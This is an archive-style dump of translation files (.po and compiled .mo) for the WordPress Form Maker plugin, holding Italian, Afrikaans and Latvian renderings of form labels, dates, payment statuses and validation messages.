#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:594
msgid "Show"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:626
msgid "Please select the field!"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:723
msgid "Choices"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:724
msgid "Percentage"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:725
msgid "Count"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:747
msgid "Unanswered"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:771
msgid "Address"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:779
msgid "Longitude"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:787
msgid "Latitude"
msgstr ""
languages/form_maker-it_IT.mo000060400000007343152434416630012212 0ustar00��5�Gl��	����������%+03;@EJPT[r{����
��	�7�*9O$SKx"����L'[*�&�%�A�=\o��A
H
_
f
n
u
{
	�
$�
,�
$�
 (/6=CJSnw�	����	�>�
+6K*NQy(����a
+�
8�
�
)Q/)�� �4%
$#,	5'2 -
10+/&!*.")3(AprilArea CodeAugustCentsCityCountryDecemberDollarsError, email was not sent.Error, file cannot be moved.Error, incorrect Security code.FebruaryFirstFromGOJanuaryJulyJuneLastMarchMayMiddleNothing was submitted.NovemberOctoberPhone NumberPostal / Zip CodeQuantityResetSelect a DateSelect a FieldSeptemberSorry, you are not allowed to upload this type of file.State / Province / RegionStreet AddressStreet Address Line 2TheThe file exceeds the allowed size ofThis field %s requires a unique entry and this value was already submitted.This is not a valid email address.TitleToVerification link is invalid.You cannot select former dates. Choose a date starting from the current one.Your email address is already verified.Your email has been successfully verified.Your email verification has timed out.Your form was successfully submitted.Your ip is blacklisted. Please contact the website administrator.Your score should be less thanfield is required.value must be betweenProject-Id-Version: form_maker
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2015-05-22 16:59+0400
PO-Revision-Date: 2015-05-22 16:59+0400
Last-Translator: 
Language-Team: 
Language: it
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Poedit-KeywordsList: _;gettext;gettext_noop;__
X-Poedit-Basepath: .
X-Generator: Poedit 1.7.6
X-Poedit-SearchPath-0: C:\wamp\www\wordpress\wp-content\plugins\form-maker
aprilePrefisso teleselettivoagostoCents. CittàPaeseDicembreDollari. Errore, e-mail non è stato inviato.Errore, il file non possono essere spostati.Errore, codice di protezione errato.febbraio.firstDaandare GennaiolugliogiugnoL'annomarzoMaggioCentraleNulla è stato presentato.novembreottobreTelefonoCAPQuantitàreset Seleziona una dataSelezionare un campo settembreSpiacenti, non sei autorizzato a caricare questo tipo di file.Stato / Provincia / RegioneIndirizzo:Via Riga indirizzo 2L'Il file supera la dimensione consentita diQuesto campo %s richiede una voce unica e questo valore è stato già presentato.Questo non è un indirizzo email valido.TitoloPerLink di verifica non è valido.Non è possibile selezionare le date precedenti. Scegliere una data a partire da quello in corso.Il tuo indirizzo e-mail è già verificato.Il tuo indirizzo email è stato verificato con successo.La verifica e-mail è scaduto.Il modulo è stato inviato correttamente.Il tuo ip è nella lista nera. Si prega di contattare l'amministratore del sito. Il tuo punteggio deve essere inferiore a campo è obbligatorio.valore deve essere compreso tra languages/form_maker-af.po000060400000056657152434416630011607 0ustar00msgid ""
msgstr ""
"Project-Id-Version: form_maker\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2015-05-22 16:48+0400\n"
"PO-Revision-Date: 2015-05-22 16:49+0400\n"
"Last-Translator: \n"
"Language-Team: \n"
"Language: af\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"X-Poedit-KeywordsList: _;gettext;gettext_noop;__\n"
"X-Poedit-Basepath: .\n"
"X-Generator: Poedit 1.7.6\n"
"X-Poedit-SearchPath-0: C:\\wamp\\www\\wordpress\\wp-content\\plugins\\form-"
"maker\n"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:240
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4201
msgid "Street Address"
msgstr "Straatadres"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:243
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4202
msgid "Street Address Line 2"
msgstr "Straatadres Line 2"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:246
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4203
msgid "City"
msgstr "stad"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:249
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4204
msgid "State / Province / Region"
msgstr "Staat / provinsie / streek"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4205
msgid "Postal / Zip Code"
msgstr "Poskode / zipcode"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:255
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4206
msgid "Country"
msgstr "land"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:104
msgid "Connection type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:140
msgid "Type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4189
msgid "January"
msgstr "januarie"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4190
msgid "February"
msgstr "februarie"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4191
msgid "March"
msgstr "maart"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4192
msgid "April"
msgstr "april"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4193
msgid "May"
msgstr "mei"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4194
msgid "June"
msgstr "junie"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4195
msgid "July"
msgstr "julie"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4196
msgid "August"
msgstr "augustus"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4197
msgid "September"
msgstr "september"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4198
msgid "October"
msgstr "oktober"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4199
msgid "November"
msgstr "november"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4200
msgid "December"
msgstr "desember"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:77
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:92
msgid "Error, incorrect Security code."
msgstr "Fout, verkeerde veiligheid kode."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:106
msgid "Your ip is blacklisted. Please contact the website administrator."
msgstr "Your ip is blacklisted. Please contact the website administrator."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:325
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:854
msgid "The file exceeds the allowed size of"
msgstr "Die lêer oorskry die toelaatbare grootte van"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:344
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:869
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2520
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4233
msgid "Sorry, you are not allowed to upload this type of file."
msgstr "Jammer, jy is nie toegelaat om hierdie tipe van die lêer op te laai."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:365
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:890
msgid "Error, file cannot be moved."
msgstr "Fout, kan die lêer nie verskuif word nie."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:743
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1207
#, php-format
msgid ""
"This field %s requires a unique entry and this value was already submitted."
msgstr ""
"Hierdie veld %s vereis 'n unieke inskrywing en hierdie waarde is reeds "
"ingedien."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:895
#, fuzzy
msgid "Error, file destination does not exist."
msgstr "Fout, e-pos is nie gestuur nie."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1434
msgid "Nothing was submitted."
msgstr "Niks is voorgelê nie."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2343
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2356
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4047
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4052
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:64
msgid "Your form was successfully submitted."
msgstr "Jou vorm is gestuur."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2351
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4043
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:61
msgid "Error, email was not sent."
msgstr "Fout, e-pos is nie gestuur nie."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:27
msgid "Your email address is already verified."
msgstr "Jou e-posadres is reeds geverifieer."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:68
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:94
msgid "Your email has been successfully verified."
msgstr "Jou e-pos is suksesvol geverifieer."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:71
msgid "Your email verification has timed out."
msgstr "Jou e-pos verifiëring het uitgetel."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:99
msgid "Verification link is invalid."
msgstr "Verifikasie skakel is ongeldig."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1034
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1085
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1156
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1203
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1307
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1379
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1484
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1499
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1673
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1855
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2022
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2155
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2290
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2340
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2457
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2560
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2728
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2918
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3088
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3245
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3386
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3487
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3546
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3661
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3718
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3778
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3892
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3906
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3921
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3936
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4238
msgid "field is required."
msgstr "veld is nodig."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1690
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4236
msgid "This is not a valid email address."
msgstr "Dit is nie 'n geldige e-pos adres."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2356
msgid ""
"You cannot select former dates. Choose a date starting from the current one."
msgstr ""
"Jy kan nie die voormalige datums te kies. Kies 'n datum vanaf die huidige "
"een."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "The"
msgstr "die "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "value must be between"
msgstr "waarde moet tussen "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2893
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2933
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3064
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3101
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3220
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3261
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4212
msgid "Quantity"
msgstr "Hoeveelheid "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3792
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4001
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4002
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4234
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4235
msgid "Your score should be less than"
msgstr "Jou telling moet minder wees as "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4185
msgid "Title"
msgstr "titel"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4186
msgid "First"
msgstr "eerste"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4187
msgid "Last"
msgstr "laaste"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4188
msgid "Middle"
msgstr "middel"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4207
msgid "Area Code"
msgstr "Area Kode"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4208
msgid "Phone Number"
msgstr "Telefoonnommer"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4209
msgid "Dollars"
msgstr "dollars "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4210
msgid "Cents"
msgstr "sent "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4213
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:300
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:586
msgid "From"
msgstr "Van "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:305
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:588
msgid "To"
msgstr "Toc"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:29
msgid "You have no permission to view submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:143
msgid "Entries"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:145
msgid "Views"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:147
msgid "Conversion Rate"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:150
msgid "Export to"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:166
msgid "GO"
msgstr "GO"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:167
msgid "Reset"
msgstr "herstel "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid "of"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid ""
"submissions are not shown, as the field you sorted by is missing in those "
"submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:357
msgid "Canceled"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:358
msgid "Cleared"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:359
msgid "Cleared by payment review"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:360
msgid "Completed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:361
msgid "Denied"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:362
msgid "Failed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:363
msgid "Held"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:364
msgid "In progress"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:365
msgid "On hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:366
msgid "Paid"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:367
msgid "Partially refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:368
msgid "Pending verification"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:369
msgid "Placed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:370
msgid "Processing"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:371
msgid "Refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:372
msgid "Refused"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:373
msgid "Removed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:374
msgid "Returned"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:375
msgid "Reversed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:376
msgid "Temporary hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:377
msgid "Unclaimed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:472
msgid "Show on Map"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:754
msgid "Total"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:510
msgid "Show Matrix"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:560
msgid "Statistics"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:564
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:568
msgid "Select a Field"
msgstr "Kies 'n Veld "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:583
msgid "Select a Date"
msgstr "Kies 'n datum"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:594
msgid "Show"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:626
msgid "Please select the field!"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:723
msgid "Choices"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:724
msgid "Percentage"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:725
msgid "Count"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:747
msgid "Unanswered"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:771
msgid "Address"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:779
msgid "Longitude"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:787
msgid "Latitude"
msgstr ""
languages/form_maker-lv.mo000060400000007251152434416630011621 0ustar00��5�Gl��	����������%+03;@EJPT[r{����
��	�7�*9O$SKx"����L'[*�&�%�A�=\o��A

J
X
`
h
q
	x
�
 �
 �
#�

�
�
	

$/5;A	Ycl}����
�?�*/@$DSi����^
)r
)�
%�
$�
M!_��4%
$#,	5'2 -
10+/&!*.")3(AprilArea CodeAugustCentsCityCountryDecemberDollarsError, email was not sent.Error, file cannot be moved.Error, incorrect Security code.FebruaryFirstFromGOJanuaryJulyJuneLastMarchMayMiddleNothing was submitted.NovemberOctoberPhone NumberPostal / Zip CodeQuantityResetSelect a DateSelect a FieldSeptemberSorry, you are not allowed to upload this type of file.State / Province / RegionStreet AddressStreet Address Line 2TheThe file exceeds the allowed size ofThis field %s requires a unique entry and this value was already submitted.This is not a valid email address.TitleToVerification link is invalid.You cannot select former dates. Choose a date starting from the current one.Your email address is already verified.Your email has been successfully verified.Your email verification has timed out.Your form was successfully submitted.Your ip is blacklisted. Please contact the website administrator.Your score should be less thanfield is required.value must be betweenProject-Id-Version: form_maker
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2015-05-22 17:00+0400
PO-Revision-Date: 2015-05-22 17:00+0400
